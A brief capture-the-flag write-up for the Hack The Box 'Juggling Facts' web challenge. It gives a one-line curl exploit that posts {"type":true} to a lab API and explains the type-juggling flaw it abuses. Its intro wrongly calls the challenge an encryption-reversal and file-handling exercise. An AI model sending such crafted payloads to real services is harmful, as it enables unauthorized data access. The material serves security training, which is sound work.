Explore the basics of cybersecurity in the Juggling facts Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/412

Description#

An organization seems to possess knowledge of the true nature of pumpkins. Can you find out what they honestly know and uncover this centuries-long secret once and for all?

Exploitation#

curl 94.237.63.109:48332/api/getfacts -d '{"type":true}'

Summary#

Juggling Facts is a very-easy-level challenge on Hack The Box that exploits a type juggling vulnerability in an API. By sending a crafted payload ({"type":true}) in a POST request, the server misinterprets the data type, allowing access to unintended functionality. This challenge demonstrates the risks of loose type handling and improper input validation in web applications.